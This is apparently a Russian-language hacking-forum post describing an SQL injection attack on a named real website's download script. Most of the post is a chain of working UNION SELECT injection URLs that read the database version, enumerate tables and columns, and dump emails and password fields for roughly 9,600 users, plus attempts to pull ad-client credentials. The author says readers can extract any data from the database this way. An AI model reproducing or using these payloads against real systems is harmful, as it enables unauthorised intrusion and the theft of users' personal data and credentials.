Форум АНТИЧАТ - http://techpowerup.com

Набрел сегодня на ресурс http://techpowerup.com
Решил посмотреть google p-r 4 индекс цитирования 275, вообщем то достаточно посещаемы... принялся за исследование.
обнаружил что присутствует недостаточная фильтрация параметра id у скриптига get.php

Код:

http://www.techpowerup.com/downloads/get.php?id=187

Немного повозился и понял что это ненаглядная 5 ветка

Код:

http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

Начал исследование

Код:

http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,count(TABLE_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables/*

Первой особо интересной таблой оказалась list_user_user. И тут оказалсь что мажик квотс нету)))

Код:

http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name='list_user_user'/*

Тут же появился запрос

Код:

http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),confirmed,entered,char(58,58,58),email,uniqid,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+list_user_user/*

9600 с чем то пользователей =)

Поехал дальше наткнулся на phpads_clients
Здесь уже все оказалось не так просто

Код:

http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name='phpads_clients'/*

Запрос получился такой:

Код:

http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),clientid,email,clientusername,clientpassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+phpads_clients/*

Но в ответ меня послали, табла не в той базе, пришлось поковыряться с table_schema:

Код:

http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,Table_schema,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+where+table_name='phpads_clients'/*

и далее пошел уже правельный запрос:

Код:

http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),clientid,email,clientusername,clientpassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+techpowerup_ads.phpads_clients/*

Но меня ожидал коллосальный облом... таблица и содержащяяся в ней инфа оказлась полным фуфлом..

Прям так все карты я раскрывать не буду, так или иначе методы действия и подходы к выводу инфы я показал, приложив немного усилий вы получите любую информацию из базы =)
Вот такие дела нынче

Код:

з.Ы таблы 

forum

moderation

moderator

administrator

можно не смотеть